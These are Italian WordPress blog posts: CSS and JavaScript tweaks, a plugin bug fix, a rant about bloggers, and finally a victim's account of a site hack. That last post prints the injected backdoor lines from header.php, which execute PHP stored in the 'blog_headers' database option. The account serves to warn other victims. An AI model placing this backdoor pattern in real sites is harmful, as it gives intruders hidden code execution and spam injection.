WordPress.com Stats e lo smiley indesiderato

smileyMi chiedevo da tempo da cosa potesse dipendere la presenza, all’interno di numerosi blog basati su WordPress, di un piccolo smiley piazzato lì a casaccio in modo discordante da tutto il resto. Tuttavia non mi ero mai posto il problema finché un bel giorno non l’ho avvistato anche sul mio blog. Dopo una breve ricerca, ho scoperto che trattasi del simbolo utilizzato dal plugin WordPress.com Stats per notificare l’avvenuta registrazione di una visita tra le statistiche relative a quel blog. La domanda nasce spontanea: si può nascondere? La risposta è ovviamente sì, peccato che il metodo ufficiale suggerito nelle faq dello stesso plugin sia inefficace. Si consigliava infatti di aggiungere la seguente riga nel CSS del proprio tema:

img#wpstats{display:none}

Fortunatamente, seguendo alcune discussioni sul forum di WordPress, ho trovato due metodi funzionanti. Il primo consiste nell’aggiungere una riga riveduta e corretta nel CSS del proprio tema:

img#wpstats{width:0px;height:0px;overflow:hidden;}

Il secondo consiste nell’aggiungere un piccolo script nel file footer.php del proprio tema, subito dopo “wp_footer();“:

<script type="text/javascript">
var e = document.getElementById("wpstats");
e.style.width = "0px";
e.style.height= "0px";
e.style.overflow = "hidden";
</script>

Ovviamente alcuni browser potrebbero non interpretare correttamente queste istruzioni continuando a visualizzare lo smiley malefico. Nel caso, citofonare Padre Damien Karras.

Il duepuntozero è morto!

PensierInEccesso 2.0Dopo ben tre anni di onorato servizio, il vecchio tema (2.0) di questo blog va finalmente in pensione per lasciare spazio ad una travagliata versione 3.0. Travagliata perché da diverso tempo stavo pensando ad un restyling, ma purtroppo non sono così figo da riuscire a far piovere gratis dal cielo decine di temi nuovi ed originali con la sola imposizione delle mani. Quindi alla fine, preso atto del mio status di Count Zero, ho deciso di affidarmi ad una professionista (anche perché ritengo che qualsiasi lavoro necessitante di impegno e di tempo vada sempre e comunque ricompensato, e benché nei miei confronti nessuno si sia mai posto il problema, io me lo sono sempre posto nei confronti degli altri). Tra l’altro proprio oggi PensierInEccesso (e non “PensierInecCesso“, né “Pensieri in eccesso“) spegne la sua quarta candelina, e questo mi sembrava un bel regalo di compleanno.

Il ruolo dei blogger

urloSi parla spesso del peso irrilevante che hanno i blogger italiani rispetto a quelli di alcuni paesi del mondo. Si spera sempre che da un post nasca un nuovo fenomeno letterario, un’inchiesta degna del miglior giornalista d’assalto, una ricerca da premio Nobel per la scienza, un’analisi economica che ci salvi dalla crisi o un virus in grado di propagare la pace nel mondo. Ora io mi chiedo: dove minchia sta scritto tutto questo? E’ forse una condizione d’uso che abbiamo distrattamente accettato quando abbiamo aperto un account su Splinder o abbiamo installato WordPress sul nostro spazio web? Che esistano alcuni blogger che sulla base delle proprie conoscenze e competenze nella vita reale (e non di ciò che scrivono sul proprio blog) siano considerati autorevoli, non può che farmi piacere. Che invece esistano dei blogger autorevoli o auto-definitisi tali o peggio dei non blogger che pretendono che la cosiddetta blogosfera sia globalmente influente ed in grado di salvare il mondo, mi fa un po’ girare le palle. D’altronde il mondo è pieno di teste di cazzo, perché la blogosfera non dovrebbe esserne la rappresentanza? Detto questo, vorrei sottoscrivere le parole con cui Stefano Vitta ha commentato l’ultimo post polemico di Vittorio Zambardino:

Tanto per sparare sulla croce rossa mi viene subito da far notare che i blogger, a differenza dei giornalisti, se non riescono ad ottenere informazioni chiare o almeno sufficienti per esprimere un giudizio hanno il LUSSO di poter non scrivere nulla. Questo non significa che il fatto sia ignorato.

Se non so, non parlo. E’ una filosofia che ho spesso sposato su questo blog, sia perché qui sopra ho da sempre privilegiato il cazzeggio, sia perché non mi piace fornire informazioni parziali rischiando le brutte figure e le querele. Per esempio qui a Chieti è da oltre un anno che dalle 22 alle 6 (ma è accaduto anche durante il giorno e senza alcun preavviso) siamo spesso con i rubinetti a secco. Inizialmente si è parlato di siccità. Poi con le piogge hanno dovuto cercare nuove scuse. Nel frattempo sono stati chiusi alcuni pozzi, ché pare che l’acqua bevuta negli ultimi anni fosse velenosa. Ci son state analisi e controanalisi con risultati sempre diversi a seconda di chi li leggeva. Tutti a scaricare le colpe su qualcun altro, facendo attenzione a non lasciare uscire le notizie fuori Regione. Tutti a preoccuparsi che le città più fighe avessero l’acqua ai danni di quelle più sfigate (e notoriamente più abituate a prenderlo nel culo silenziosamente). Ad oggi, conviviamo con una situazione da terzo mondo in attesa che le autorità competenti facciano chiarezza. Non so chi siano i responsabili, non ne ho parlato. Ma i giornalisti?

Stesso discorso per la crisi economica mondiale. Non ne capisco, preferisco tacere ed ascoltare le analisi di chi è esperto della materia. Potrei osservare che ad ogni minima scoreggia americana, in Europa succede un finimondo. Potrei osservare che se i media parlano di crisi, i piccoli risparmiatori vanno nel panico e vendono tutto facendo il doppio errore di rendere reale una perdita che prima era solo virtuale e di far scendere ancora di più le borse in attesa che i grandi decidano di fare la spesa a prezzi stracciati. Potrei osservare che quando aumenta il prezzo del barile di petrolio immediatamente il mio benzinaio ritocca tutti i prezzi, ma la stessa cosa non è avvenuta (non nelle stesse proporzioni) adesso che il barile costa esattamente la metà rispetto a qualche mese fa. Ma sicuramente queste cose non funzionano nel modo semplice e semplicistico in cui le ho descritte io. E allora parlo di cazzate, ché di quelle sono abbastanza esperto.

Problemi con il media manager di WordPress 2.5?

WordPressSe mentre stai scrivendo un post dal pannello di controllo della versione 2.5 (o superiore) di WordPress non riesci ad aggiungere un immagine, un video o un file musicale perché ti si apre sempre una finestra nella quale campeggia l’enigmatico messaggio “Sei davvero sicuro di voler fare questo? Riprovare“, probabilmente stai usando il plugin WP-ContactForm 1.5.1. Poiché l’autore, ad oggi, non si è ancora accorto della cosa o comunque non ha ancora trovato il tempo e la voglia di aggiornare il plugin risolvendo il problema di compatibilità con le ultime versioni di WordPress, le soluzioni sono due: utilizzare qualche altro plugin che svolga la stessa funzione (quella cioè di creare facilmente una pagina contenente una form per essere contattati senza rendere pubblico il proprio indirizzo email), oppure fixare manualmente il problema. La soluzione, disponibile all’interno di un topic del forum di supporto ufficiale di WordPress, consiste nel modificare il file wp-contactform.php (via ftp o direttamente dalla pagina dei plugin del pannello di controllo di WordPress) individuando questo blocco di codice:

//Grab some default user info, if available (Submitted by Dan)
$wpcf_auto_email = get_profile('user_email');
$wpcf_auto_ID = get_profile('ID');
$wpcf_auto_first_name = get_usermeta($wpcf_auto_ID, 'first_name');
$wpcf_auto_last_name = get_usermeta($wpcf_auto_ID, 'last_name');
$wpcf_auto_name = $wpcf_auto_first_name.' '.$wpcf_auto_last_name;
if (empty($_POST['wpcf_email'])) {
$_POST['wpcf_email'] = $wpcf_auto_email;
}
if (empty($_POST['wpcf_your_name'])) {
$_POST['wpcf_your_name'] = $wpcf_auto_name;
}

e rimuovendolo dalla sua posizione originaria (verso l’inizio del file) per andarlo ad incollare subito prima di questa linea (riga 137 del file):

if(wpcf_check_input()) // If the input check returns true (ie. there has been a submission & input is ok)

Et voilà!

“Goro” spam: vulnerabilità WordPress?

GoroIl post nel quale Mik racconta di un problema di sicurezza avuto sul suo blog, mi ha fatto ricordare che qualche tempo fa una cosa del genere è successa anche a me. Un simpatico burlone era riuscito a modificare il file header.php del mio tema in modo tale da far apparire alcune righe di link spammosi (i soliti viagra, cialis, rolex fasulli e casinò online) sopra la testata del blog. Stranamente questi link a me non venivano mostrati, quindi non mi ero accorto di niente. Poi il caro Manfrys, scherzando, mi ha chiesto quanto stessi guadagnando da tutta quella pubblicità e così è scattato l’allarme rosso e mi sono fiondato su Google alla ricerca di informazioni e consigli utili per risolvere questa vulnerabilità. Risultato della ricerca: zero. Problemi simili al mio si erano verificati su blog che giravano su versioni molto vecchie di WordPress, sfruttando una falla poi chiusa: io invece stavo utilizzando l’ultima versione disponibile (all’epoca la 2.3.3) e non avevo installato alcun plugin di cui fossero noti problemi. Da una rapida occhiata al sorgente della home pubblicata online, mi sono accorto che i link di spam venivano richiamati attraverso un misterioso:

<div id="goro"> <a href="...">...</a> </div>

In corrispondenza dell’enigmatico goro, nel file header.php erano state aggiunte le seguenti righe di codice:

<?php create_function('', get_option("blog_headers")); ?>
...
<?php $wp_headers() ?>

In pratica, il caro untore era riuscito persino a sputtanarmi il database. Non essendo io in grado di stabilire se la colpa fosse di WordPress, del mio hosting o di chissà cosa, non ho potuto fare altro che ripristinare il file header.php da un backup, eliminare le centinaia di voci rss_millemilacaratteriacazzo aggiunte alla tabella wp_options del database ed infine blindare le cartelle di WordPress, rinunciando anche alla possibilità di modificare i file del mio tema ed i plugin direttamente dal pannello di controllo. Condivido la mia (dis)avventura affinché altre eventuali vittime di questo pirla possano arrivare qui tramite Google e risolvere il problema, ma soprattutto affinché eventuali guru possano magari capire come eliminarne la causa.